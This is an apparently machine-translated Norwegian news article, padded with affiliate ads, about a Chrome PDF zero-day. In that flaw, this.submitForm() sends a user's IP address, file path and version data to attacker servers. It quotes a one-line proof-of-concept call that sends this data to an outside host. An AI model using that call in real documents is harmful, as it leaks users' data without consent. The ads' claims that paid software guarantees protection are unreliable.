- EdgeSpot oppdaget en spennende null-dagers sårbarhet som utnytter PDF-dokumenter i Chrome.
- Dette sårbarhet kan skade deg ved å høste sensitive data på din PC.
- Utforsk vår Web & Cloud-side for mer innsikt om andre verktøy og tjenester.
- Hvis du er interessert i nettlesere, gir vi rikelig med informasjon om dem i vår Browsers Hub.
Gjør alle dokumentene dine tilgjengelige og sikre ved hjelp av Adobe Acrobat Reader. Dette dokumenthåndteringsverktøyet lar deg også e-signere og opprette offisielle skjemaer for å spare tid på jobben. Skaff deg den til PC-en din, så kan du:
- Åpne, skriv ut og rediger alle PDF-filer og andre filtyper
- Fyll ut PDF-skjemaer lettere
- Hold viktige dokumenter kryptert
Få alle apper til en spesialpris!
Verdens nr.1 dokumenthåndteringsprogramvare er nå til en bra pris, så skynd deg!
Utnyttelsesdeteksjonstjenesten EdgeSpot oppdaget en spennende Chrome null-dagers sårbarhet som utnytter PDF-dokumenter.
Sårbarheten gjør det mulig for angripere å høste sensitive data ved hjelp av ondsinnede PDF-dokumenter som er åpnet i Chrome.
Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et ondsinnet program å fungere i bakgrunnen ved å samle inn brukerdata.
Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter mot følgende data på din PC:
- IP adresse
- Hele banen til PDF-filen på systemet
- OS- og Chrome-versjoner
Pass på PDF-filer som er skadet av skadelig programvare
Eksperter fikk øye på det ene av de to domenene readnotify [.] com eller burpcollaborator [.] nett mottok dataene.
De avslørte at angriperne bruker this.submitForm () PDF Javascript API for å samle sensitiv informasjon fra brukerne.
Vi testet det med en minimal PoC, en enkel API-samtale som this.submitForm (‘ http://google.com/test’) får Google Chrome til å sende personopplysningene til google.com.
Denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer, begge sirkulerte i henholdsvis oktober 2017 og september 2018.
Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batchen av filer ble samlet ved hjelp av ReadNotifys PDF-sporingstjeneste.
Brukere kan bruke tjenesten til å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten til det andre settet med PDF-filer.
Hurtigtips: Bytt nettleser til Opera
I disse urolige tider blir vi angrepet med skadelig programvare, phishing og trojanere i hvert trinn, så vi må være mye mer årvåkne og være beskyttet.
Og siden dette er et spesifikt problem for Chrome, kan du unngå den trusselen og alle andre med en sikkerhetsorientert nettleser som Opera.
Denne nettleseren kommer med en innebygd annonseblokkering som ikke bare fjerner slike distraksjoner, men også blokkerer analyseskript, sporingspiksler og metoder for å samle inn dataene dine.
Og hvis du vil være helt sikker på at du holder deg unna noen fare, kan du komme deg bak den innebygde VPN tjeneste som er 100% gratis å bruke i ubegrenset tid.
Opera
Opera tilbyr den perfekte trusselsbeskyttelsen med den innebygde annonseblokkeringen og VPN-tjenesten gratis!
Besøk nettsiden
Hvordan kan jeg være beskyttet mot PDF-sårbarheter?
Last ned Adobe Acrobat PRO
Adobe og Chrome passer godt sammen når det gjelder håndtering av PDF-filer. Ved å installere Adobe Extension for Chrome, kan du se gjennom og manipulere PDF-filer etter eget ønske uten å forlate favorittleseren din.
Til tross for sin robuste struktur, kan det hende at skadelig programvare skjult i PDF-filer ikke blir oppdaget hvis du bruker standardversjonen av Reader.
Den profesjonelle versjonen anbefales for å garantere beskyttelsen din og holde dataene dine borte fra hackere.
Selv om det ikke er gratis, er prisen du betaler ganske liten for mengden ekstra funksjoner du vil glede deg over, inkludert forbedret sikkerhet for PDF-filene dine.
Det er også en 7-dagers gratis prøveperiode inkludert, slik at du kan få en smak av hele Pro-opplevelsen før du kjøper.
Adobe Acrobat PRO
Hold deg unna skadelig programvare ved å laste ned Adobe Acrobat PRO. Den har mange flere funksjoner enn den gratis versjonen og holder dataene dine trygge.
Besøk nettsiden
I tilfelle du vil være sikker mens du surfer på internett, må du skaffe deg et fullt dedikert verktøy for å sikre nettverket ditt. Installer privat internettilgang nå og sikre deg. Den beskytter PCen din mot angrep mens du surfer, maskerer IP-adressen din og blokkerer all uønsket tilgang.
Utnyttelsesgjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer fordi oppdateringen ikke var forventet å bli utgitt i nær fremtid.
EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en oppdatering i slutten av april.
Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å se mottatte PDF-dokumenter lokalt ved hjelp av en annen leser-app.
Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett.
ofte stilte spørsmål
Ja det gjør det. Men hvis du vil ha et bredere utvalg, utforske våre toppvalg for Chromepersonvern utvidelser i denne komplette guiden.
Ther er mange utvidelser som tillater PDF-filer behandling. Sjekk ut vår utmerket guide om de beste PDF-utvidelsene for Chrome.
Det gjør det ikke, men du kan aktivere det raskt. Her er vår omfattende guide om hvordan du aktiverer QR-kodegeneratoren i Chrome.